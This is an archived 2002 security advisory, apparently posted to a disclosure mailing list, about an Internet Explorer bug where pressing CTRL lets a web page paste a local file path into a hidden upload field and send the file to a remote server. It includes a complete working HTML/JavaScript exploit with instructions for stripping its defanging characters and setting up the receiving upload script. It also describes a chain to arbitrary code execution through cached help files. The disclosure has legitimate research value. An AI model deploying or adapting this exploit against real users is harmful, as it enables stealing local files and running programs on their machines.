Pressing CTRL in IE is dangerous - Sandblad advisory #8

From: Andreas Sandblad (sandbladat_private)
Date: Tue Jul 23 2002 - 12:50:30 PDT


                      - Sandblad advisory #8 -
    
    ---..---..---..---..---..---..---..---..---..---..---..---..----
    Title:      Pressing CTRL in IE is dangerous
    Date:       [2002-07-23]
    Software:   Internet Explorer
    Impact:     Pressing CTRL in IE may result in an arbitrary local
                file being uploaded to a remote server (no exact
                path needed). If sensitive information is
                uploaded, it may be used to run arbitrary programs.
    Vendor:     http://www.microsoft.com/              _     _
    Patch:      none                                 o' \,=./ `o
    Author:     Andreas Sandblad, sandbladat_private   (o o)
    ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
    
    
    VENDOR STATUS:
    ==============
    
    02-06-16
    Microsoft was contacted about the issue.
    
    02-07-23
    Microsoft sent the following statement:
    "After investigation, our product team has confirmed that this does not
    meet the bar of a security vulnerability. We will not be releasing a
    hotfix or patch for this issue."
    They proposed the following possible workarounds:
    1. disable or set to prompt - "Submit nonencrypted form data" option
    2. disable "allow paste operations via script" (best)
    3. disable active scripting
    
    
    DESCRIPTION:
    ============
    
    A specially crafted webpage can retrieve any local file using simple
    JavaScript. This is possible by performing the following steps:
    
    1. When a user presses the CTRL key, an onkeydown handler fires. In the
    handler the key code of the pressed key is changed to that of 'V'. The
    result is a paste operation that is subject to fewer restrictions than
    a paste initiated from script alone.
    
    2. The clipboard content is replaced with the path of the file to steal,
    and focus is moved to a hidden file upload field. The paste is performed
    into that field, changing the value of the file upload field (something
    script is normally not allowed to do).
    
    3. The upload form is submitted automatically (a legal JavaScript
    operation).
    
    It isn't necessary to know the exact path to local files because it's
    possible to refer to a file with a relative path such as "..\filename".
    
    Furthermore, if the local file "..\LOCALS~1\TEMPOR~1\CONTENT.IE5\index.dat"
    is uploaded, the names of the randomly named subdirectories of the
    Temporary Internet Files folder can be read from it, which gives the
    exact path to a cached file. Knowing the exact path, a compiled help
    file (.chm) previously fetched into the cache can be launched with
    showHelp() (the old .chm attack). A compiled help file is allowed to
    contain instructions that execute arbitrary programs.
    
    
    EXPLOIT:
    ========
    
    Instructions:
    Put the HTML code in a remote HTML document and load it with Internet
    Explorer. Activate the exploit by pressing CTRL. You must prepare a
    server-side script to receive the upload ("upload.php"). If you choose
    PHP, I recommend
    http://www.php.net/manual/en/features.file-upload.php
    as a reference on how to set up a server-side script that handles a file
    upload.
    
    Note:
    1. Please remove all "!" characters in the exploit code. They have been
    inserted to decrease false virus alarms triggered by this mail.
    2. Default settings are assumed.
    
    Exploit:
    -------------------------- CUT HERE -------------------------------
    <!div id=h style="zoom:0.0001">
    <!form name=u enctype="multipart/form-data" method=post action=upload.php>
    <!input type=file name=file></form></div>
    <!script>
    // Target file, as a relative path (see DESCRIPTION). Swap in the
    // commented line to fetch the cache index.dat instead.
    //uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
    uploadFile="..\\Cookies\\index.dat";
    function gotKey(){
      if (!event.ctrlKey) return;                        // wait for CTRL
      document.onkeydown = null;                         // fire only once
      event.keyCode = 86;                                // turn the keystroke into 'V' (paste)
      window.clipboardData.setData("Text",uploadFile);   // text that will be pasted
      (p=document.forms.u.file).focus();                 // paste lands in the file input
      p.onpropertychange = function(){document.forms.u.submit()};  // submit once the value changes
    } document.onkeydown = gotKey;
    window.onload=function(){document.body.focus()};    // make sure the page gets key events
    <!/script>
    -------------------------- CUT HERE -------------------------------
    
    
    Disclaimer:
    ===========
    Andreas Sandblad is not responsible for the misuse of the
    information provided in this advisory. The opinions expressed
    are my own and not of any company. In no event shall the author
    be liable for any damages whatsoever arising out of or in
    connection with the use or spread of this advisory. Any use of
    the information is at the user's own risk.
    
    
    Old advisories:
    ===============
    #7 [2002-05-19] "IE dot bug"
    http://online.securityfocus.com/archive/1/273168
    #6 [2002-05-15] "Opera javascript protocoll vulnerability"
    http://online.securityfocus.com/archive/1/272583
    #5 [2002-04-26] "Mp3 file can execute code in Winamp."
    http://online.securityfocus.com/archive/1/269724
    #4 [2002-04-15] "Using the backbutton in IE is dangerous."
    http://online.securityfocus.com/archive/1/267561
    
    
    Feedback:
    =========
    Please send suggestions and comments to:           _     _
    sandbladat_private                              o' \,=./ `o
                                                        (o o)
    ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
    Andreas Sandblad,
    student in Engineering Physics at Umea University, Sweden.
    -/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--
    
    This archive was generated by hypermail 2b30 : Tue Jul 23 2002 - 13:22:26 PDT